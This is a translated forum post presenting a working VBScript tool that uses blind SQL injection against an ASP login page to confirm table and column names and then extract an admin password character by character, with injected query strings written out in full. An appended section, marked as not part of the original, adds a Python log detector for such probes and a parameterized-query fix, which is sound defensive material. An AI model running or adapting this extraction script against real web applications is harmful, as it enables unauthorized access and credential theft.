
Implementing SQL injection in VBS

By: jinsdb[B.C.T]

Someone used the Test.SendRequest("http://" & g_sServer & "/testfiles/browser.asp") method provided by Microsoft ACT to write a VBS injection tool. However, using that object means installing a toolkit several tens of MB in size, so here I have written a script modeled on it that uses Microsoft.XMLHTTP instead and submits requests with the Open function, to crack the password on a page that has an injection flaw:

RightW = "OK!" ' Keyword returned by the page when the injected condition is true.
tablename = "useradmin" ' Table and column names. This program does not guess table or column names; it only guesses the password.
filedname = "password"
WScript.Echo "Start check the tname and the fname,please waiting... ..."
URL = "http://127.0.0.1/fwork/f.asp?username=admin&password=abzvc" ' URL with the injection flaw. What follows targets a string-type injection; a numeric type needs only slight changes.
Set xPost = CreateObject("Microsoft.XMLHTTP")

' Check whether the table name is correct
sURL1 = URL & "'%20and%20(Select%20Count(1)%20from%20[useradmin])>='0"
xPost.Open "POST", sURL1, 0
xPost.Send "1212312"
If InStr(xPost.responseText, RightW) <> 0 Then
    WScript.Echo "table name is:" & tablename
End If

' Check whether the column name is correct
sURL2 = URL & "'%20and%20(Select%20Count([useradmin].[password])%20from%20[useradmin])>='0"
xPost.Open "POST", sURL2, 0
xPost.Send "1212312"
If InStr(xPost.responseText, RightW) <> 0 Then
    WScript.Echo "field name is:" & filedname
End If

WScript.Echo "Start gussing,Waiting... ..."

' Guess the password length
For i = 0 To 128 Step 1
    sURL3 = URL & "'and+(select%20username%20from%20useradmin%20where%20len(password)='" & i & "'%20and%20username='user')>='0"
    xPost.Open "POST", sURL3, 0
    xPost.Send "1212312"
    If InStr(xPost.responseText, RightW) <> 0 Then
        Exit For
    End If
Next
pwd_len = i
WScript.Echo "the pass length is:" & pwd_len

' Guess the password
pwd = ""
strings = "0123456789abcdefghijklmnopqrstuvwxyz" ' Custom password character set
For j = 1 To pwd_len Step 1
    For k = 1 To Len(strings) Step 1
        sURL4 = URL & "'%20and%20(select%20username%20from%20useradmin%20where%20left(password," & j & ")%20='" & pwd & Mid(strings, k, 1) & "'%20and%20username='user')>='0"
        xPost.Open "POST", sURL4, 0
        xPost.Send "1212312"
        If InStr(xPost.responseText, RightW) <> 0 Then
            pwd = pwd & Mid(strings, k, 1)
            Exit For
        End If
    Next
Next

' Report through the built-in Err object
If Err.Number <> 0 Then
    WScript.Echo "error:" & Err.Description
    Err.Clear
Else
    WScript.Echo "!!!Password:" & pwd
End If
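Added example, not part of the original post: because the script above puts its payload in the URL query string of each POST, the requests land in the web server's access log, where the stepping len()/left() comparisons stand out. The Python sketch below flags that pattern; the log field order, the function names and the `min_probes` threshold are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Comparisons that a boolean-based extraction steps through one value at a time.
LEN_PROBE = re.compile(r"len\(\s*\[?\w+\]?\s*\)\s*=\s*'?(\d+)", re.I)
LEFT_PROBE = re.compile(r"left\(\s*\[?\w+\]?\s*,\s*(\d+)\s*\)", re.I)

def constructed_log():
    """Constructed sample lines in an assumed W3C-style layout:
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    base = "2024-01-01 10:00:{:02d} {} POST /fwork/f.asp {} 200"
    probe = ("username=admin&password=x'%20and%20(select%20username%20from%20"
             "useradmin%20where%20{}%20and%20username='user')>='0")
    lines = [base.format(i, "10.0.0.5", probe.format(f"len(password)='{i}'"))
             for i in range(4)]
    lines += [base.format(10 + j, "10.0.0.5", probe.format(f"left(password,{j})%20='a'"))
              for j in range(1, 4)]
    # An ordinary login from another client, which must not be flagged.
    lines.append(base.format(30, "10.0.0.9", "username=bob&password=left(field)"))
    return lines

def find_blind_sqli(lines, min_probes=3):
    """Return {(client_ip, path): {"len": [...], "left": [...]}} for clients whose
    query strings carry at least min_probes distinct len()/left() probe values."""
    seen = defaultdict(lambda: {"len": set(), "left": set()})
    for line in lines:
        parts = line.split()
        if line.startswith("#") or len(parts) < 7:
            continue  # skip log header directives and malformed lines
        ip, path, query = parts[2], parts[4], unquote_plus(parts[5])
        for kind, rx in (("len", LEN_PROBE), ("left", LEFT_PROBE)):
            for m in rx.finditer(query):
                seen[(ip, path)][kind].add(int(m.group(1)))
    return {key: {kind: sorted(vals) for kind, vals in probes.items()}
            for key, probes in seen.items()
            if len(probes["len"]) + len(probes["left"]) >= min_probes}

if __name__ == "__main__":
    for (ip, path), probes in find_blind_sqli(constructed_log()).items():
        print(ip, path, probes)
```

The underlying fix is on the server side: the page should pass the username and password to the database as bound parameters rather than concatenating them into the SQL string.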


Heh, the home page was already updated with this the other day...
